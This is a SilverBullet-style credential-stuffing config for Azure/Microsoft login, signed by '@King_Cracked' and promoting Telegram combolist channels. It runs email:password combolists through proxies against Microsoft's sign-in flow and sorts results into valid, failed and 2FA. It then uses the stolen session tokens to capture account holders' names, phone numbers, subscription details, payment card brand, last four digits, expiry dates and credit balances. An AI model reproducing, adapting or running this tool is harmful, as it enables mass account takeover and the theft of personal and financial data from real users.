[SETTINGS]
{
  "Name": "Azure.Microsoft.com ➥ (#LOGIN-CONFIG) ➥ (FULL-CAPTURE) ➥ (WEB) ➥ ʙʏ ➥ [@King_Cracked]",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2022-01-03T12:18:59.9212757+00:00",
  "AdditionalInfo": " 𝐓𝐄𝐋𝐄𝐆𝐑𝐀𝐌 : https://t.me/Config_list ",
  "RequiredPlugins": [],
  "Author": "@King_Cracked",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [
    {
      "Description": " 𝐓𝐄𝐋𝐄𝐆𝐑𝐀𝐌 : https://t.me/Config_list",
      "VariableName": "〖ᴷⁱⁿᴳ𝐂𝐑𝐀𝐂𝐊𝐈𝐍𝐆 𝐓𝐎𝐎𝐋𝐒 𝐌𝐀𝐒𝐓𝐄𝐑❾❾✓",
      "Id": 1839691111
    },
    {
      "Description": "https://t.me/Combolist_TXT",
      "VariableName": "@King_Cracked",
      "Id": 1839691111
    }
  ],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Azure.Microsoft",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#US FUNCTION URLEncode "<USER>" -> VAR "US" 

#PS FUNCTION URLEncode "<PASS>" -> VAR "PS" 

#GET-LOC REQUEST GET "https://azure.microsoft.com/auth/signin/?loginProvider=Microsoft&redirectUri=%2Fen-us%2F" AutoRedirect=FALSE 
  
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "referer: https://azure.microsoft.com/en-us/" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 

#LOC PARSE "<HEADERS(Location)>" LR "" "" -> VAR "LOC" 

#GET-AZURE REQUEST GET "<LOC>" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: login.microsoftonline.com" 
  HEADER "Referer: https://azure.microsoft.com/" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62" 

#CA PARSE "<SOURCE>" LR "canary\":\"" "\"" -> VAR "CA" 

#CAEN FUNCTION URLEncode "<CA>" -> VAR "CAEN" 

#SFT PARSE "<SOURCE>" LR "sFT\":\"" "\"" -> VAR "SFT" 

#STX PARSE "<SOURCE>" LR "sCtx\":\"" "\"" -> VAR "STX" 

#HID FUNCTION GenerateGUID -> VAR "HID" 

#CHECK-USER REQUEST POST "https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US" 
  CONTENT "{\"username\":\"<USER>\",\"isOtherIdpSupported\":true,\"checkPhones\":false,\"isRemoteNGCSupported\":true,\"isCookieBannerShown\":false,\"isFidoSupported\":true,\"originalRequest\":\"<STX>\",\"country\":\"US\",\"forceotclogin\":false,\"isExternalFederationDisallowed\":false,\"isRemoteConnectSupported\":false,\"federationFlags\":0,\"isSignup\":false,\"flowToken\":\"<SFT>\",\"isAccessPassSupported\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: application/json" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: login.microsoftonline.com" 
  HEADER "hpgact: 1800" 
  HEADER "hpgid: 1104" 
  HEADER "hpgrequestid: <HID>" 
  HEADER "Origin: https://login.microsoftonline.com" 
  HEADER "Referer: <LOC>" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-GPC: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "IfExistsResult\":1" 
  KEYCHAIN Success OR 
    KEY "IfExistsResult\":0" 

#ACA PARSE "<SOURCE>" LR "apiCanary\":\"" "\"" -> VAR "ACA" 

#LOGIN-AZURE REQUEST POST "https://login.microsoftonline.com/common/login" AutoRedirect=FALSE 
  CONTENT "i13=0&login=<US>&loginfmt=<US>&type=11&LoginOptions=3&lrt=&lrtPartition=&hisRegion=&hisScaleUnit=&passwd=<PS>&ps=2&psRNGCDefaultType=&psRNGCEntropy=&psRNGCSLK=&canary=<CAEN>&ctx=<STX>&hpgrequestid=<HID>&flowToken=<SFT>&PPSX=&NewUser=1&FoundMSAs=&fspost=0&i21=0&CookieDisclosure=0&IsFidoSupported=1&isSignupPost=0&i2=1&i17=&i18=&i19=1552951" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: login.microsoftonline.com" 
  HEADER "Origin: https://login.microsoftonline.com" 
  HEADER "Referer: <LOC>" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Your account or password is incorrect." 
  KEYCHAIN Success OR 
    KEY "return e.STR_Kmsi_Title=\"Stay signed in?" 
    KEY "Do this to reduce the number of times you are asked to sign in." 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Please enter the code to sign in." 
    KEY "We texted your phone" 

#SFT2 PARSE "<SOURCE>" LR "sFT\":\"" "\"" -> VAR "SFT2" 

#STX2 PARSE "<SOURCE>" LR "sCtx\":\"" "\"" -> VAR "STX2" 

#(GET-TOKEN) REQUEST POST "https://login.microsoftonline.com/kmsi" 
  CONTENT "LoginOptions=1&type=28&ctx=<STX2>&hpgrequestid=<HID>&flowToken=<SFT2>&canary=<CAEN>&i2=&i17=&i18=&i19=62286" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: login.microsoftonline.com" 
  HEADER "Origin: https://login.microsoftonline.com" 
  HEADER "Referer: https://login.microsoftonline.com/common/login" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62" 

#CODE PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"code\" value=\"" "\" />" -> VAR "CODE" 

#ID-TOKEN PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"id_token\" value=\"" "\" />" -> VAR "ID-TOKEN" 

#STE PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"state\" value=\"" "\" />" EncodeOutput=TRUE -> VAR "STE" 

#SETE PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"session_state\" value=\"" "\" />" -> VAR "SETE" 

#(GET-LOC2) REQUEST GET "https://portal.azure.com/signin/idpRedirect.js/?sessionId=aca66e925ec5443db1b251018ff868bd&feature.argsubscriptions=true&feature.showservicehealthalerts=true&feature.prefetchtokens=false&feature.internalgraphapiversion=true&feature.globalresourcefilter=true&idpc=0" AutoRedirect=FALSE 
  
  HEADER ": scheme: https" 
  HEADER "accept: */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "referer: https://portal.azure.com/" 
  HEADER "sec-fetch-dest: script" 
  HEADER "sec-fetch-mode: no-cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 

#LOC2 PARSE "<SOURCE>" LR "]}}," "\");" -> VAR "LOC2" 

#LOC3 FUNCTION Replace "\"https" "https" "<LOC2>" -> VAR "LOC3" 

#(GET-TOKEN2) REQUEST GET "<LOC3>" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: login.microsoftonline.com" 
  HEADER "Referer: https://portal.azure.com/" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-GPC: 1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62" 

#CODE2 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"code\" value=\"" "\" />" -> VAR "CODE2" 

#ID-TOKEN2 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"id_token\" value=\"" "\" />" -> VAR "ID-TOKEN2" 

#STE2 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"state\" value=\"" "\" />" EncodeOutput=TRUE -> VAR "STE2" 

#SETE2 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"session_state\" value=\"" "\" />" -> VAR "SETE2" 

#(AUTH-TOKEN) REQUEST POST "https://portal.azure.com/signin/index/" 
  CONTENT "code=<CODE2>&id_token=<ID-TOKEN2>&state=<STE2>&session_state=<SETE2>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "origin: https://login.microsoftonline.com" 
  HEADER "referer: https://login.microsoftonline.com/" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: cross-site" 
  HEADER "sec-gpc: 1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 

#AUTH-TOKEN PARSE "<SOURCE>" LR "{\"oAuthToken\":{\"authHeader\":\"" "\"," -> VAR "AUTH-TOKEN" 

#BALANCE REQUEST GET "https://www.microsoftazuresponsorships.com/Balance" 
  
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.microsoftazuresponsorships.com" 
  HEADER "Referer: https://www.microsoftazuresponsorships.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Microsoft Edge\";v=\"96\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62" 

#CODE3 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"code\" value=\"" "\" />" -> VAR "CODE3" 

#ID-TOKEN3 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"id_token\" value=\"" "\" />" -> VAR "ID-TOKEN3" 

#STE3 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"state\" value=\"" "\" />" EncodeOutput=TRUE -> VAR "STE3" 

#SETE3 PARSE "<SOURCE>" LR "<input type=\"hidden\" name=\"session_state\" value=\"" "\" />" -> VAR "SETE3" 

#(GET-ACCOUNT) REQUEST GET "https://management.azure.com/providers/Microsoft.Billing/billingAccounts?$expand=address&api-version=2019-10-01-preview" 
  
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Language: en" 
  HEADER "Authorization: <AUTH-TOKEN>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 
  HEADER "x-ms-command-name: Microsoft_Azure_Billing." 
  HEADER "x-ms-effective-locale: en.en-us" 

#Account_Status PARSE "<SOURCE>" LR "{\"accountStatus\":\"" "\"" CreateEmpty=FALSE -> CAP "Account Status" 

#Account_Type PARSE "<SOURCE>" LR "accountType\":\"" "\"" CreateEmpty=FALSE -> CAP "Account Type" 

#Currency PARSE "<SOURCE>" LR "currencyCode\":\"" "\"" -> VAR "Currency" 

#FN PARSE "<SOURCE>" LR "firstName\":\"" "\"" -> VAR "FN" 

#LN PARSE "<SOURCE>" LR "lastName\":\"" "\"" -> VAR "LN" 

#Full_Name FUNCTION Constant "<FN> <LN>" -> CAP "Full Name" 

#Country PARSE "<SOURCE>" LR "country\":\"" "\"" CreateEmpty=FALSE -> CAP "Country" 

#Phone_Number PARSE "<SOURCE>" LR "phone\":\"" "\"" CreateEmpty=FALSE -> CAP "Phone Number" 

#(GET-SUBSCRIPTION) REQUEST POST "https://portal.azure.com/api/Portal/GetLazyUserData?feature.globalresourcefilter=true" 
  CONTENT "{\"version\":\"2019-10-01\",\"armAuthorizationHeader\":\"<AUTH-TOKEN>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en" 
  HEADER "authorization: <AUTH-TOKEN>" 
  HEADER "origin: https://portal.azure.com" 
  HEADER "referer: https://portal.azure.com/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 
  HEADER "x-ms-effective-locale: en.en-us" 
  HEADER "x-ms-version: 8.199.0.5 (production#c54abc1337.210909-2040) Signed" 
  HEADER "x-requested-with: XMLHttpRequest" 

#Subscription_Name PARSE "<SOURCE>" LR "resourceName\":\"" "\"" CreateEmpty=FALSE -> CAP "Subscription Name" 

#Subscription_Status PARSE "<SOURCE>" LR "state\":\"" "\"" CreateEmpty=FALSE -> CAP "Subscription Status" 

#Status PARSE "<SOURCE>" LR "status\":\"" "\"" CreateEmpty=FALSE -> CAP "Status" 

#quotaID PARSE "<SOURCE>" LR "quotaId\":\"" "\"" CreateEmpty=FALSE -> CAP "quotaID" 

#Suspend PARSE "<SOURCE>" LR "spendingLimit\":\"" "\"" CreateEmpty=FALSE -> CAP "Suspend" 

#(GET-CID) REQUEST GET "https://signup.azure.com/api/accounts/paymentProfile" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en" 
  HEADER "Authorization: <AUTH-TOKEN>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 
  HEADER "x-ms-effective-locale: en.en-us" 

#CID PARSE "<SOURCE>" LR "{\"caid\":\"" "\"" -> VAR "CID" 

#(GET-PAYMENTS) REQUEST GET "https://service.bmx.azure.com/api/Billing/Account/PaymentInstrumentsV2?api-version=2019-01-14&commerceAccountId=<CID>&mintAccountId=" 
  
  HEADER "Accept: */*" 
  HEADER "Accept-Language: en" 
  HEADER "Authorization: <AUTH-TOKEN>" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36" 
  HEADER "x-ms-effective-locale: en.en-us" 

#Payment_Type PARSE "<SOURCE>" LR "paymentInstrumentKindString\":\"" "\"" CreateEmpty=FALSE -> CAP "Payment Type" 

#BRD PARSE "<SOURCE>" LR "brand\":\"" "\"" Recursive=TRUE -> VAR "BRD" 

#Payment_Method FUNCTION Translate 
  KEY "MC" VALUE "MasterCard" 
  "<BRD>" -> CAP "Payment Method" 

#Number_Last_Four PARSE "<SOURCE>" LR "accountNumberLastFour\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Number Last Four" 

#Expiration_Date PARSE "<SOURCE>" LR "expirationDate\":\"" "\"" Recursive=TRUE CreateEmpty=FALSE -> CAP "Expiration Date" 

#MY-BALANCE REQUEST POST "https://www.microsoftazuresponsorships.com/Account/Login" 
  CONTENT "code=<CODE3>&id_token=<ID-TOKEN3>&state=<STE3>&session_state=<SETE3>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: www.microsoftazuresponsorships.com" 
  HEADER "Origin: https://login.microsoftonline.com" 
  HEADER "Referer: https://login.microsoftonline.com/" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"96\", \"Microsoft Edge\";v=\"96\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62" 

#IsActive PARSE "<SOURCE>" LR "IsActive\":" ",\"" CreateEmpty=FALSE -> CAP "IsActive" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "valueMapById\":{}" 
    KEY "Total\",\"value\":0" 
    KEY "{\"recentResources\":{}" 
    KEY "<Subscription Status>" DoesNotContain "Enabled" 
  KEYCHAIN Custom "EXPIRED" OR 
    KEY "<Account Status>" Contains "Disabled" 
    KEY "<Subscription Status>" Contains "Warned" 
    KEY "<Subscription Status>" Contains "Disabled" 
    KEY "<IsActive>" Contains "false" 
    KEY "Your Azure account is disabled" 

#Remaining_Balance PARSE "<SOURCE>" LR "RemainingBalance\":" ",\"" CreateEmpty=FALSE -> CAP "Remaining Balance" "" " <Currency>" 

#Used_Balance PARSE "<SOURCE>" LR "ToDateRegistrationTotalPrice\":" ",\"" CreateEmpty=FALSE -> CAP "Used Balance" "" " <Currency>" 

#Active_Subscription PARSE "<SOURCE>" LR "ActiveSubscriptionCount\":" ",\"" CreateEmpty=FALSE -> CAP "Active Subscription" 

#Days_Left PARSE "<SOURCE>" LR "\"DaysLeft\":" ",\"" CreateEmpty=FALSE -> CAP "Days Left" 

#Expiry_Date PARSE "<SOURCE>" LR "EndDate\":\"" "\"," CreateEmpty=FALSE -> CAP "Expiry Date" 

#(@King_Cracked) FUNCTION Constant "★ 『 [@King_Cracked] 』 ★" -> CAP "𝐂𝐎𝐍𝐅𝐈𝐆 𝐁𝐘 ➥" @King_Cracked

